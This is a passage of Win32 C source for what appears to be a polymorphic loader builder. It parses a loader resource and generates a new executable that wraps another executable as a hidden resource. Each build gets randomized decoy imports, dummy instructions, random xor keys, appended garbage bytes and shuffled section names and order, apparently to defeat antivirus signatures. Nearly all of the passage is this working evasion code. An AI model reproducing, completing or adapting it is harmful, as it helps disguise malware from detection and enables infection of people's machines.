      wsprintf( DbgMsg, "    loader code at %08X, size %d bytes\r\n", i, Ld->LSize );
      DbgOut();
#   endif

#   ifdef TEST
      wsprintf( DbgMsg, "  done\r\n" );
      DbgOut();
#   endif
  }


static void ParseLoaderCodeSection( LOADERDATA* Ld )
/*
  Second pass on loader code - parse raw data into structure
*/
  {
    BYTE* p;
    BYTE  b;
    char  *cp;
    int   i, j;

#   ifdef TEST
      wsprintf( DbgMsg, "  parsing loader code section:\r\n" );
      DbgOut();
#   endif

    Ld->MaxInstrSz = 0;


    // parsing itable

    for( p = Ld->pITable, i = 0; *p != 0; p += *p + 2, i++ ) {
      Ld->ITable[ i ].Sz = *p;
      if( Ld->ITable[ i ].Sz > Ld->MaxInstrSz )  // check for maximum size
        Ld->MaxInstrSz = Ld->ITable[ i ].Sz;
      Ld->ITable[ i ].ModFlag = *(p + 1);
      for( b = 0; b <= *p; b++ ) Ld->ITable[ i ].Instr[ b ] = *(p + b + 2);
    }
#   ifdef TEST
      wsprintf( DbgMsg, "    itable: done, %d instructions; max isz %d\r\n", i, Ld->MaxInstrSz );
      DbgOut();
#   endif


    // parsing itable2

    for( p = Ld->pITable2, i = 0; *p != 0; p += *p + 2, i++ ) {
      Ld->ITable2[ i ].Sz = *p + 4; // adding DWORD field (immediate address)
      if( Ld->ITable[ i ].Sz > Ld->MaxInstrSz )  // check for maximum size
        Ld->MaxInstrSz = Ld->ITable[ i ].Sz;
      Ld->ITable2[ i ].ModFlag = *(p + 1);
      for( b = 0; b < *p; b++ ) Ld->ITable2[ i ].Instr[ b ] = *(p + b + 2);
      for( b = 0; b < 4; b++ ) Ld->ITable2[ i ].Instr[ b ] = 0;
    }
#   ifdef TEST
      wsprintf( DbgMsg, "    itable2: done, %d instructions; max isz %d\r\n", i, Ld->MaxInstrSz );
      DbgOut();
#   endif


    // parsing prologue import table

    for( p = (BYTE*)(Ld->pImpCallDest), i = 0; *p != 0; i++ ) {
      lstrcpy( Ld->PImps[ i ].Function, (char*) p );
      p += lstrlen( (char*) p ) + 1;
      lstrcpy( Ld->PImps[ i ].Module, (char*) p );
      p += lstrlen( (char*) p ) + 1;
    }
#   ifdef TEST
      wsprintf( DbgMsg, "    prologue import table: done, %d entries\r\n", i );
      DbgOut();
#   endif


    // parsing prologue

    for( p = Ld->pPDesc, i = 0; i < Ld->PCount; p += 9, i++ ) {
      Ld->Prologue[ i ].Instr.Sz = *(((DWORD*) p) + 1);
      Ld->Prologue[ i ].Instr.ModFlag = *(p + 8);
      for( j = 0; j < *(((DWORD*) p) + 1); j++ )
        Ld->Prologue[ i ].Instr.Instr[ j ] = Ld->pProlog[ *((DWORD*) p) + j ];
      if( Ld->Prologue[ i ].Instr.Instr[ 0 ] == 0xE8 ) { // call instruction
        Ld->Prologue[ i ].Type = I2T_CALLDEST;
        // find call destination and determine index in import table
        for( j = 0;; j++ ) {
          cp = (char*)(Ld->pProlog
                          + *((DWORD*) &Ld->Prologue[ i ].Instr.Instr[ 1 ])
                          + *((DWORD*) p)
                          + Ld->Prologue[ i ].Instr.Sz );
          if( lstrcmp( Ld->PImps[ j ].Function, cp ) == 0 ) {
            Ld->Prologue[ i ].Value = (BYTE) j;
            break;
          }
        }
#       ifdef TEST
          wsprintf( DbgMsg, "    instruction %d: call destination %d\r\n", i, (unsigned) Ld->Prologue[ i ].Value );
          DbgOut();
#       endif
      }
      else if( Ld->Prologue[ i ].Instr.Instr[ 0 ] == 0x0F &&
              Ld->Prologue[ i ].Instr.Instr[ 1 ] == 0x85 ) { // jmp instruction
        Ld->Prologue[ i ].Type = I2T_JUMPDEST;
        // jump fixup table is not used - dest idx is third byte in instruction
        Ld->Prologue[ i ].Value = Ld->Prologue[ i ].Instr.Instr[ 2 ];
#       ifdef TEST
          wsprintf( DbgMsg, "    instruction %d: jump to %d\r\n", i, (unsigned) Ld->Prologue[ i ].Value );
          DbgOut();
#       endif
      }
      else {
        // look for OFFSET Code_Begin locations
        for( j = 0; j < Ld->CBCount; j++ )
          if( *((DWORD*)(Ld->pCodeBeginDesc + j * 5 )) == *((DWORD*) p) ) {
            Ld->Prologue[ i ].Type = I2T_CBEGIN;
            Ld->Prologue[ i ].Value = *(Ld->pCodeBeginDesc + j * 5 + 4 );
            break;
          }
        if( j < Ld->CBCount ) {
#         ifdef TEST
            wsprintf( DbgMsg, "    instruction %d: offset must be at %d\r\n", i, (unsigned) Ld->Prologue[ i ].Value );
            DbgOut();
#         endif
        }
        else {
          // look for xor location
          for( j = 0; j < 4; j++ )
            if( Ld->pXorLocs[ j ] == *((DWORD*) p) ) {
              Ld->Prologue[ i ].Type = I2T_XOR;
              Ld->Prologue[ i ].Value = (BYTE) (j + 1);
              break;
            }
          if( j < 4 ) {
#           ifdef TEST
              wsprintf( DbgMsg, "    instruction %d: xor value idx %d\r\n", i, (unsigned) Ld->Prologue[ i ].Value );
              DbgOut();
#           endif
          }
          else
            Ld->Prologue[ i ].Type = I2T_REGULAR;
        }
      }
    }


    // copy loader code

    RtlCopyMemory( Ld->LCode, Ld->pLCode, Ld->LSize );

#   ifdef TEST
      wsprintf( DbgMsg, "  done\r\n" );
      DbgOut();
#   endif
  }


/*
  Parse loader data into convenient structure
*/

static LOADERDATA* GetLoaderData( BYTE* p )
  {
    LOADERDATA  Ld;
    LOADERDATA  *Rc;
    int   MemSz, i;

#   ifdef TEST
      wsprintf( DbgMsg, "reading loader resource:\r\n" );
      DbgOut();
#   endif

    // do first pass

    ScanLoaderExecutable( p, &Ld );
    ScanLoaderCodeSection( &Ld );

    // allocate memory for all data

    MemSz = sizeof( LOADERDATA ) +
            Ld.ICount * sizeof( INSTRUCTION ) +
            Ld.ICount2 * sizeof( INSTRUCTION ) +
            Ld.PCount * sizeof( INSTRUCTION2 ) +
            Ld.PImpCount * sizeof( IMPORTENTRY ) +
            Ld.LSize +
            Ld.WsImpCount * sizeof( DWORD );
    Rc = (LOADERDATA*) LocalAlloc( LMEM_FIXED, MemSz );
    if( Rc == NULL ) {
#     ifdef TEST
        wsprintf( DbgMsg, "LocalAlloc( %d ) failed\r\n", MemSz );
        DbgOut();
#     endif
      return NULL;
    }

    // set all pointers in loader data structure

    RtlCopyMemory( Rc, &Ld, sizeof( LOADERDATA ) );

    i = sizeof( LOADERDATA );
    Rc->ITable = (INSTRUCTION*) (((char*) Rc) + i);

    i += Ld.ICount * sizeof( INSTRUCTION );
    Rc->ITable2 = (INSTRUCTION*) (((char*) Rc) + i);

    i += Ld.ICount2 * sizeof( INSTRUCTION );
    Rc->Prologue = (INSTRUCTION2*) (((char*) Rc) + i);

    i += Ld.PCount * sizeof( INSTRUCTION2 );
    Rc->PImps = (IMPORTENTRY*) (((char*) Rc) + i);

    i += Ld.PImpCount * sizeof( IMPORTENTRY );
    Rc->LCode = (BYTE*) (((char*) Rc) + i);

    i += Ld.LSize;
    Rc->WsImps = (DWORD*) (((char*) Rc) + i);
    RtlMoveMemory( Rc->WsImps,
                   GetWinsockImportNames( p ), Rc->WsImpCount * sizeof(DWORD) );

    // finally, parse loader's code section into structure

    ParseLoaderCodeSection( Rc );

#   ifdef TEST
      wsprintf( DbgMsg, "done\r\n" );
      DbgOut();
#   endif

    return Rc;
  }


/*
  Fill table with unique random values in range 0..Range-1
*/
static void RndFill( DWORD* Dest, DWORD DestSz, DWORD Range )
  {
    DWORD* Buf;
    DWORD  i, j, sz;

    // ok, let it be dumb implementation ;(
    Buf = (DWORD*) LocalAlloc( LMEM_FIXED, sizeof( DWORD ) * Range );
    if( Buf == NULL ) {
      // error - simply initialize dest with sequentally numbers
      for( i = 0; i < DestSz; i++ ) Dest[ i ] = i;
      return;
    }
    for( i = 0; i < Range; i++ ) Buf[ i ] = i;
    sz = Range;
    for( i = 0; i < DestSz; i++ ) {
      j = Rand() % sz;
      Dest[ i ] = Buf[ j ];
      RtlMoveMemory( &Buf[ j ], &Buf[ j + 1 ], (sz - j - 1) * sizeof(DWORD) );
      sz--;
    }
    LocalFree( Buf );
  }

/*
  Sets required import indexe in EXEDEF import table
*/
static void SetRequiredImportIdx( char* FuncName,
                                  DWORD* ImpIdx, DWORD ImpCount,
                                  char* FuncTable[], DWORD FuncCount,
                                  DWORD* endpoint )
  {
    DWORD  i, k;

    // don't touch import table before endpoint

    *endpoint += 1 + (Rand() & 1);

    // determine function index

    for( i = 0; i < FuncCount; i++ )
      if( lstrcmpi( FuncName, FuncTable[ i ] ) == 0 ) break;

    // find function index in import table

    for( k = 0; k < ImpCount; k++ )
      if( ImpIdx[ k ] == i ) {

        // function already in the table - swap it to endpoint position
        // if it is after endpoint

        if( k <= *endpoint ) {
#         ifdef TEST
            wsprintf( DbgMsg, "required %s:%d is at position %d, endpoint is %d - no special care\r\n", FuncName, i, k, *endpoint );
            DbgOut();
#         endif
          return;
        }
#       ifdef TEST
          wsprintf( DbgMsg, "required %s:%d is at position %d, but endpoint is %d - swap\r\n", FuncName, i, k, *endpoint );
          DbgOut();
#       endif
        ImpIdx[ k ] = ImpIdx[ *endpoint ];
        ImpIdx[ *endpoint ] = i;
        return;
      }

#   ifdef TEST
      wsprintf( DbgMsg, "required %s:%d is not in table, adding at endpoint %d\r\n", FuncName, i, *endpoint );
      DbgOut();
#   endif
    ImpIdx[ *endpoint ] = i;
  }


/*
  returns total length of function names using EXEDEF import tables
*/
static DWORD GetImpFuncNamesLength( char* FuncNames[],
                                    DWORD* ImpIdx, DWORD ImpCount )
  {
    DWORD  i, c;

    for( c = i = 0; i < ImpCount; i++ )
      c += lstrlen( FuncNames[ ImpIdx[ i ] ] ) + 3; // 2 bytes before name
    return c;
  }


/*
  Define executable file parameters and structure
*/

static EXEDEF* DefineNewExe( LOADERDATA* Ld, BYTE* ExeImage )
  {
    EXEDEF   Tmp;
    EXEDEF*  Rc;
    DWORD    *DummyCount, *dp, *ImpBuf;
    DWORD    krnlp, userp, a, b, i, j, LdrICount;
    BYTE     *bp;
    char     *cp;
    IMAGE_SECTION_HEADER   *shp;

    // first, define approx. size of new executable

    DummyCount = (DWORD*) LocalAlloc( LMEM_FIXED,
                                  (Ld->PCount + 1) * sizeof( DWORD ) );
    if( DummyCount == NULL ) {
#     ifdef TEST
        wsprintf( DbgMsg, "LocalAlloc failed\r\n" );
        DbgOut();
#     endif
      return NULL;
    }

    LdrICount = 0;
    for( i = 1; i < Ld->PCount + 1; i++ ) {
      DummyCount[ i ] = MIN_DUMMY_COUNT + Rand() % MAX_DUMMY_COUNT;
      LdrICount += DummyCount[ i ];
    }
    DummyCount[ 0 ] = Rand() % MAX_DUMMY_COUNT; // instructions before entry pt
    LdrICount += DummyCount[ 0 ];

    Tmp.ExeAddSz = (Rand() % MAX_EXE_ADD + 3) & ~3;
#   ifdef TEST
      wsprintf( DbgMsg, "instructions: %d additional size %d\r\n", LdrICount, Tmp.ExeAddSz );
      DbgOut();
#   endif


    // get actual size of ExeImage (all headers size + offset of
    // the last section + its length

    shp = (IMAGE_SECTION_HEADER*) SECHDROFFSET( ExeImage );
    j = ((IMAGE_FILE_HEADER*) PEFHDROFFSET( ExeImage ))->NumberOfSections;
    a = 0; b = 0;
    for( i = 0; i < j; i++, shp++ )
      if( a < shp->PointerToRawData ) {
        a = shp->PointerToRawData;
        b = shp->SizeOfRawData;
      }
    b += a;
#   ifdef TEST
      wsprintf( DbgMsg, "actual image size %d bytes\r\n", b );
      DbgOut();
#   endif


    // add garbage to ExeImage

    Tmp.ExeAddSz = Tmp.ExeAddSz;
    for( i = 0; i < Tmp.ExeAddSz; i++ )
      ExeImage[ b + i ] = (BYTE) Rand();
    Tmp.ActualExeSize = b + Tmp.ExeAddSz;
#   ifdef TEST
      wsprintf( DbgMsg, "added %d bytes, exe image size %d bytes\r\n",
                Tmp.ExeAddSz, Tmp.ActualExeSize );
      DbgOut();
#   endif


    // count loader required imports

    bp = Ld->LCode + 9;
    Tmp.ReqKernelImpCount = 0;
    Tmp.ReqUserImpCount = 0;
    while( *bp != 0 ) {
      i = lstrlen( (char*) bp + 6 ) + 1;
      cp = (char*) bp + 6 + i;
      if( lstrcmpi( cp, "kernel32.dll" ) == 0 ) Tmp.ReqKernelImpCount++;
      else if( lstrcmpi( cp, "user32.dll" ) == 0 ) Tmp.ReqUserImpCount++;
      bp += 6 + i + lstrlen( cp ) + 1;
    }
#   ifdef TEST
      wsprintf( DbgMsg, "required imports: kernel - %d, user - %d\r\n",
                Tmp.ReqKernelImpCount, Tmp.ReqUserImpCount );
      DbgOut();
#   endif


    // define import tables size as real/max loader size
    // and required imports for loader

    Tmp.KernelImpCount = 6 + 2 * Tmp.ReqKernelImpCount
                               + Rand() % (KERNEL32_FUNC_COUNT * LdrICount
                         / (Ld->PCount * (MAX_DUMMY_COUNT + MIN_DUMMY_COUNT)));
    if( Tmp.KernelImpCount > KERNEL32_FUNC_COUNT )
      Tmp.KernelImpCount = KERNEL32_FUNC_COUNT;

    Tmp.UserImpCount = 8 + 2 * Tmp.ReqUserImpCount
                             + Rand() % (USER32_FUNC_COUNT * LdrICount
                         / (Ld->PCount * (MAX_DUMMY_COUNT + MIN_DUMMY_COUNT)));
    if( Tmp.UserImpCount > USER32_FUNC_COUNT )
      Tmp.UserImpCount = USER32_FUNC_COUNT;

    Tmp.GdiImpCount = Rand() % (GDI32_FUNC_COUNT * LdrICount
                         / (Ld->PCount * (MAX_DUMMY_COUNT + MIN_DUMMY_COUNT)));
    Tmp.GdiImpCount %= GDI32_FUNC_COUNT;

    Tmp.AdvapiImpCount = Rand() % (ADVAPI32_FUNC_COUNT * LdrICount
                         / (Ld->PCount * (MAX_DUMMY_COUNT + MIN_DUMMY_COUNT)));
    Tmp.AdvapiImpCount %= ADVAPI32_FUNC_COUNT;

#   ifdef TEST
      wsprintf( DbgMsg, "imports: %d for kernel, %d for user, %d for gdi, %d for advapi\r\n",
                Tmp.KernelImpCount, Tmp.UserImpCount, Tmp.GdiImpCount, Tmp.AdvapiImpCount );
      DbgOut();
#   endif


    // define number of winsock imports

    Tmp.RequiredWsImpNames = GetWinsockImportNames( ExeImage );
    if( Tmp.RequiredWsImpNames == NULL ) {
      LocalFree( DummyCount );
      return NULL;
    }
    for( a = 0; *(Tmp.RequiredWsImpNames + a) != 0; a++ );
#   ifdef TEST
      wsprintf( DbgMsg, "required winsock imports: %d\r\n", a );
      DbgOut();
#   endif
    Tmp.RequiredWsImpCount = a;
    Tmp.WinsockImpCount = a;
    if( a - Ld->WsImpCount > 1 )
      Tmp.WinsockImpCount += Rand() % (Ld->WsImpCount - a);
#   ifdef TEST
      wsprintf( DbgMsg, "winsock imports: %d\r\n", Tmp.WinsockImpCount );
      DbgOut();
#   endif


    // define resource types, count for each type, ids and sizes

    Tmp.RsrcTypeCount = 1 + Rand() % (MAX_RESOURCE_TYPES - 1);
    Tmp.RsrcTotal = 0;
    a = 32000 / Tmp.RsrcTypeCount;
#   ifdef TEST
      wsprintf( DbgMsg, "resource types %d, a=%d\r\n", Tmp.RsrcTypeCount, a );
      DbgOut();
#   endif
    for( i = 0; i < Tmp.RsrcTypeCount; i++ ) { // note that we ascend
      if( i == 0 )
        Tmp.RsrcType[ i ] = 256 + Rand() % a;
      else
        Tmp.RsrcType[ i ] = Tmp.RsrcType[ i - 1 ] + 1 + Rand() % a;
      Tmp.RsrcCount[ i ] = 1 + Rand() % (MAX_RESOURCE_COUNT - 1);
      Tmp.RsrcTotal += Tmp.RsrcCount[ i ];
      b = 1000 / Tmp.RsrcCount[ i ];
      for( j = 0; j < Tmp.RsrcCount[ i ]; j++ ) {
        if( j == 0 )
          Tmp.RsrcId[ i ][ j ] = 1 + Rand() % b;
        else
          Tmp.RsrcId[ i ][ j ] = Tmp.RsrcId[ i ][ j - 1 ] + 1 + Rand() % b;
        Tmp.RsrcSize[ i ][ j ] = (35 + Rand() % MAX_RESOURCE_SIZE) & ~4;
      }
#     ifdef TEST
        wsprintf( DbgMsg, "resource type %d:", Tmp.RsrcType[ i ] );
        for( j = 0; j < Tmp.RsrcCount[ i ]; j++ )
          wsprintf( DbgMsg + lstrlen( DbgMsg ), "  %d", Tmp.RsrcId[ i ][ j ] );
        wsprintf( DbgMsg + lstrlen( DbgMsg ), "\r\n" );
        DbgOut();
#     endif
    }


    // cast for resource type and id for executable

    a = Rand() % Tmp.RsrcTypeCount; // resource type index
    Tmp.ExeResType = Tmp.RsrcType[ a ];
    b = Rand() % Tmp.RsrcCount[ a ];
    Tmp.ExeResId = Tmp.RsrcId[ a ][ b ];
    Tmp.RsrcSize[ a ][ b ] = Tmp.ActualExeSize;
#   ifdef TEST
      wsprintf( DbgMsg, "exe resource type %d, id %d\r\n", Tmp.ExeResType, Tmp.ExeResId );
      DbgOut();
#   endif


    // generate import tables

    ImpBuf = (DWORD*) LocalAlloc( LMEM_FIXED, sizeof( DWORD ) *
                                  (Tmp.KernelImpCount + Tmp.UserImpCount
                                   + Tmp.GdiImpCount + Tmp.AdvapiImpCount) );
    if( ImpBuf == NULL ) {
#     ifdef TEST
        wsprintf( DbgMsg, "LocalAlloc failed\r\n" );
        DbgOut();
#     endif
      LocalFree( DummyCount );
      return NULL;
    }

    a = 0;
    Tmp.KernelImpIdx = ImpBuf + a;
    a += Tmp.KernelImpCount;
    Tmp.UserImpIdx = ImpBuf + a;
    a += Tmp.UserImpCount;
    Tmp.GdiImpIdx = ImpBuf + a;
    a += Tmp.GdiImpCount;
    Tmp.AdvapiImpIdx = ImpBuf + a;
    // a += Tmp.AdvapiImpCount;

    RndFill( Tmp.KernelImpIdx, Tmp.KernelImpCount, KERNEL32_FUNC_COUNT );
    RndFill( Tmp.UserImpIdx, Tmp.UserImpCount, USER32_FUNC_COUNT );
    RndFill( Tmp.GdiImpIdx, Tmp.GdiImpCount, GDI32_FUNC_COUNT );
    RndFill( Tmp.AdvapiImpIdx, Tmp.AdvapiImpCount, ADVAPI32_FUNC_COUNT );

    // set required imports 

    bp = Ld->LCode + 9;
    krnlp = userp = 0;
    while( *bp != 0 ) {
      i = lstrlen( (char*) bp + 6 ) + 1;
      cp = (char*) bp + 6 + i;
      if( lstrcmpi( cp, "kernel32.dll" ) == 0 )
        SetRequiredImportIdx( (char*) bp + 6,
                              Tmp.KernelImpIdx, Tmp.KernelImpCount,
                              Kernel32Func, KERNEL32_FUNC_COUNT, &krnlp );
      else if( lstrcmpi( cp, "user32.dll" ) == 0 )
        SetRequiredImportIdx( (char*) bp + 6,
                              Tmp.UserImpIdx, Tmp.UserImpCount,
                              User32Func, USER32_FUNC_COUNT, &userp );
      bp += 6 + i + lstrlen( cp ) + 1;
    }


    // calculate approx/real sizes for sections

    Tmp.CodeSectionSz = LdrICount * Ld->MaxInstrSz  // approx size of code
                        + Ld->LSize + 4096          // section
                        + 6 * ( Tmp.KernelImpCount       // jump table
                              + Tmp.UserImpCount + Tmp.GdiImpCount
                              + Tmp.AdvapiImpCount + Tmp.WinsockImpCount );
#   ifdef TEST
      wsprintf( DbgMsg, "code section size %d bytes\r\n", Tmp.CodeSectionSz );
      DbgOut();
#   endif

    Tmp.DataSectionSz = MIN_DATA_SECTION_SZ + Rand() % MAX_DATA_SECTION_SZ;
    Tmp.DataRelocations = Tmp.DataSectionSz * DATARELOC_NUM / DATARELOC_DENOM;
#   ifdef TEST
      wsprintf( DbgMsg, "data section size %d bytes (%d reloc.)\r\n", Tmp.DataSectionSz, Tmp.DataRelocations );
      DbgOut();
#   endif

    Tmp.RelocSectionSz = sizeof( WORD ) * (RELOC_NUM * LdrICount / RELOC_DENOM
                                    + Tmp.DataRelocations
                                    + Tmp.KernelImpCount
                                    + Tmp.UserImpCount + Tmp.GdiImpCount
                                    + Tmp.AdvapiImpCount + Tmp.WinsockImpCount)
                         + (1 + Tmp.CodeSectionSz / 4096) * 2 * sizeof(DWORD) // block headers
                         + 4096;
#   ifdef TEST
      wsprintf( DbgMsg, "reloc section size %d bytes\r\n", Tmp.RelocSectionSz );
      DbgOut();
#   endif

    Tmp.IdataSectionSz = 20 * (MODULE_COUNT + 1)  // import module directory
                         + 2 * sizeof( DWORD )
                           * ( Tmp.KernelImpCount + 1
                             + Tmp.UserImpCount + 1 + Tmp.GdiImpCount + 1
                             + Tmp.AdvapiImpCount + 1 + Tmp.WinsockImpCount + 1)
                             + GetImpFuncNamesLength( Kernel32Func,
                                       Tmp.KernelImpIdx, Tmp.KernelImpCount )
                             + GetImpFuncNamesLength( User32Func,
                                       Tmp.UserImpIdx, Tmp.UserImpCount )
                             + GetImpFuncNamesLength( Gdi32Func,
                                       Tmp.GdiImpIdx, Tmp.GdiImpCount )
                             + GetImpFuncNamesLength( Advapi32Func,
                                       Tmp.AdvapiImpIdx, Tmp.AdvapiImpCount )
                         + 16 * MODULE_COUNT; // reserve for module names
    Tmp.PutModulesTogether = Rand() & 1;
    Tmp.SplitNameAddr = Rand() & 1;
#   ifdef TEST
      wsprintf( DbgMsg, "idata section size %d bytes, together %d split %d\r\n",
                Tmp.IdataSectionSz, Tmp.PutModulesTogether, Tmp.SplitNameAddr );
      DbgOut();
#   endif

    Tmp.RsrcSectionSz = Tmp.RsrcTotal * ( 16 // data entry sz
                                        + 8  // language - directory entry sz
                                        + 16 // language - directory sz
                                        + 8  // id - directory entry sz
                                        + 16 // id - directory sz
                                        + 8  // type - directory entry sz
                                        )
                        + Tmp.RsrcTypeCount * ( 16 // type - directory sz
                                        + 8  // root - directory entry sz
                                        )
                        + 16; // root directory entry
    // note that rsrcsection size does not include resource data
#   ifdef TEST
      wsprintf( DbgMsg, "rsrc header size %d bytes\r\n", Tmp.RsrcSectionSz );
      DbgOut();
#   endif

    // optional sections
    if( Rand() & 1 )
      Tmp.RdataSectionSz = MIN_RDATA_SECTION_SZ + Rand() % MAX_RDATA_SECTION_SZ;
    else
      Tmp.RdataSectionSz = 0;
#   ifdef TEST
      wsprintf( DbgMsg, "rdata section size %d bytes\r\n", Tmp.RdataSectionSz );
      DbgOut();
#   endif

    if( Rand() & 1 )
      Tmp.BssSectionSz = MIN_BSS_SECTION_SZ + Rand() % MAX_BSS_SECTION_SZ;
    else
      Tmp.BssSectionSz = 0;
#   ifdef TEST
      wsprintf( DbgMsg, "bss section size %d bytes\r\n", Tmp.BssSectionSz );
      DbgOut();
#   endif


    // cast for some section names

    Tmp.CodeSectionName = CodeSecNames[ Rand() % CODE_SEC_NAMES_COUNT ];
    if( Tmp.DataSectionSz != 0 )
      Tmp.DataSectionName = DataSecNames[ Rand() % DATA_SEC_NAMES_COUNT ];
    if( Tmp.BssSectionSz != 0 )
      Tmp.BssSectionName = BssSecNames[ Rand() % BSS_SEC_NAMES_COUNT ];


    // allocate EXEDEF structure and buffers

    a = sizeof( EXEDEF ) + sizeof( DWORD )
                     * (Ld->PCount + 1    // dummy count table
                         + Tmp.KernelImpCount + Tmp.UserImpCount // imp tables
                         + Tmp.GdiImpCount + Tmp.AdvapiImpCount
                         + Tmp.WinsockImpCount)
                     + 4096                 // for file header buffer
                     + Tmp.CodeSectionSz
                     + Tmp.RelocSectionSz
                     + Tmp.IdataSectionSz
                     + Tmp.RsrcSectionSz;
    Rc = (EXEDEF*) LocalAlloc( LMEM_FIXED, a );
    if( Rc == NULL ) {
#     ifdef TEST
        wsprintf( DbgMsg, "LocalAlloc( %d ) (exedef) failed\r\n", a );
        DbgOut();
#     endif
      LocalFree( ImpBuf );
      LocalFree( DummyCount );
      return NULL;
    }
#   ifdef TEST
      wsprintf( DbgMsg, "%d bytes allocated for exedef\r\n", a );
      DbgOut();
#   endif

    // set pointers, copy data

    RtlMoveMemory( Rc, &Tmp, sizeof( EXEDEF ) );
    dp = (DWORD*)(Rc + 1);
    Rc->DummyCount = dp;
    RtlMoveMemory( Rc->DummyCount, DummyCount,
                   (Ld->PCount + 1) * sizeof( DWORD ) );
    LocalFree( DummyCount );
    dp += Ld->PCount + 1;
    Rc->KernelImpIdx = dp;
    dp += Rc->KernelImpCount;
    Rc->UserImpIdx = dp;
    dp += Rc->UserImpCount;
    Rc->GdiImpIdx = dp;
    dp += Rc->GdiImpCount;
    Rc->AdvapiImpIdx = dp;
    dp += Rc->AdvapiImpCount;
    Rc->WinsockImpNames = dp;
    dp += Rc->WinsockImpCount;
    Rc->HdrBuf = (BYTE*) dp;
    dp = (DWORD*) (((BYTE*) dp) + 4096);
    Rc->CodeBuf = (BYTE*) dp;
    dp = (DWORD*) (((BYTE*) dp) + Rc->CodeSectionSz);
    Rc->RelocBuf = (BYTE*) dp;
    dp = (DWORD*) (((BYTE*) dp) + Rc->RelocSectionSz);
    Rc->IdataBuf = (BYTE*) dp;
    dp = (DWORD*) (((BYTE*) dp) + Rc->IdataSectionSz);
    Rc->RsrcBuf = (BYTE*) dp;
    // dp = (DWORD*) (((BYTE*) dp) + Rc->RsrcSectionSz);

    RtlMoveMemory( Rc->KernelImpIdx, Tmp.KernelImpIdx, sizeof(DWORD)*Rc->KernelImpCount );
    RtlMoveMemory( Rc->UserImpIdx, Tmp.UserImpIdx, sizeof(DWORD)*Rc->UserImpCount );
    RtlMoveMemory( Rc->GdiImpIdx, Tmp.GdiImpIdx, sizeof(DWORD)*Rc->GdiImpCount );
    RtlMoveMemory( Rc->AdvapiImpIdx, Tmp.AdvapiImpIdx, sizeof(DWORD)*Rc->AdvapiImpCount );
    LocalFree( ImpBuf );


    // set winsock import names

    // first, initialize table with random indexes to Ld->WsImps
    RndFill( Rc->WinsockImpNames, Rc->WinsockImpCount, Ld->WsImpCount );

    // second, set required imports like SetRequiredImportIdx does it
    for( i = 0; i < Rc->RequiredWsImpCount; i++ ) {
      a = Rc->RequiredWsImpNames[ i ]; // function 'name'

      // check function index is in the table
      for( j = 0; j < Rc->WinsockImpCount; j++ )
        if( a == Ld->WsImps[ Rc->WinsockImpNames[ j ] ] ) break;

      if( j >= Rc->WinsockImpCount ) {

        // function is not in the table - add
        for( j = 0; j < Rc->WinsockImpCount; j++ ) {

          // careful, don't erase required entry
          for( b = 0; b < Rc->RequiredWsImpCount; b++ )
            if( Ld->WsImps[ Rc->WinsockImpNames[ j ] ]
                  == Rc->RequiredWsImpNames[ b ] ) break;
          if( b >= Rc->RequiredWsImpCount ) {
#           ifdef TEST
              wsprintf( DbgMsg, "adding required winsock import name %08X at position %d\r\n", a, j );
              DbgOut();
#           endif

            // we need to determine name index in Ld->WsImps
            for( b = 0; b < Ld->WsImpCount; b++ )
              if( a == Ld->WsImps[ b ] ) break;
            Rc->WinsockImpNames[ j ] = b;
            break;
          }
        }
      }
    }

    // finally, replace indexes with values
    for( j = 0; j < Rc->WinsockImpCount; j++ ) {
#     ifdef TEST
        wsprintf( DbgMsg, "winsock import name %d: %08X (index %d)\r\n",
           j, Ld->WsImps[ Rc->WinsockImpNames[ j ] ], Rc->WinsockImpNames[ j ] );
        DbgOut();
#     endif
      Rc->WinsockImpNames[ j ] = Ld->WsImps[ Rc->WinsockImpNames[ j ] ];
    }


    // define xor values

    for( i = 0; i < 4; i++ ) {
      Rc->XorValues[ i ] = (Rand() << 16) ^ Rand();
#     ifdef TEST
        wsprintf( DbgMsg, "xor value %c %08X\r\n", (char)('a' + i), Rc->XorValues[ i ] );
        DbgOut();
#     endif
    }


    // determine virtual addresses for sections and order

    Rc->SectionOrder = 0;
    Rc->NumberOfSections = 1;
    i = 0x1000;  // starting address
    Rc->CodeSectionVA = i;
    i += (Rc->CodeSectionSz + 4095) & ~ 4095;
#   ifdef TEST
      wsprintf( DbgMsg, "virtual address of code section %08X\r\n", Rc->CodeSectionVA );
      DbgOut();
#   endif

    j = 1; // idata va is not set yet
    if( Rand() % 1 ) {

      // idata first

      Rc->IdataSectionVA = i;
      i += (Rc->IdataSectionSz + 4095) & ~ 4095;
      j = 0; // idata va is set
      Rc->SectionOrder = (Rc->SectionOrder << 4) + SECTION_IMPORT;
      Rc->NumberOfSections++;
#     ifdef TEST
        wsprintf( DbgMsg, "virtual address of idata section %08X\r\n", Rc->IdataSectionVA );
        DbgOut();
#     endif
    }

    // define data sections order
    a = 0x012;
    if( Rand() & 1 ) // a - swap
      a = ((a >> 4) & 0xF) + ((a << 4) & 0xF0) + (a & 0xF00);
    if( Rand() & 1 ) // b - swap
      a = ((a >> 4) & 0xF0) + ((a << 4) & 0xF00) + (a & 0xF);
    if( Rand() & 1 ) // c - swap
      a = ((a >> 8) & 0xF) + ((a << 8) & 0xF00) + (a & 0xF0);
#   ifdef TEST
      wsprintf( DbgMsg, "data order %03X\r\n", a );
      DbgOut();
#   endif

    for( b = 0; b < 3; b++ ) {
      switch( a & 0xF ) {
        case 0:
          Rc->DataSectionVA = i;
          i += (Rc->DataSectionSz + 4095) & ~ 4095;
          Rc->SectionOrder = (Rc->SectionOrder << 4) + SECTION_DATA;
          Rc->NumberOfSections++;
#         ifdef TEST
            wsprintf( DbgMsg, "virtual address of data section %08X\r\n", Rc->DataSectionVA );
            DbgOut();
#         endif
          break;
        case 1:
          if( Rc->RdataSectionSz != 0 ) {
            Rc->RdataSectionVA = i;
            i += (Rc->RdataSectionSz + 4095) & ~ 4095;
            Rc->SectionOrder = (Rc->SectionOrder << 4) + SECTION_RDATA;
            Rc->NumberOfSections++;
#           ifdef TEST
              wsprintf( DbgMsg, "virtual address of rdata section %08X\r\n", Rc->RdataSectionVA );
              DbgOut();
#           endif
          }
          break;
        case 2:
          if( Rc->BssSectionSz != 0 ) {
            Rc->BssSectionVA = i;
            i += (Rc->BssSectionSz + 4095) & ~ 4095;
            Rc->SectionOrder = (Rc->SectionOrder << 4) + SECTION_BSS;
            Rc->NumberOfSections++;
#           ifdef TEST
              wsprintf( DbgMsg, "virtual address of bss section %08X\r\n", Rc->BssSectionVA );
              DbgOut();
#           endif
          }
          break;
      }
      a >>= 4;
    }

    if( j ) {
      Rc->IdataSectionVA = i;
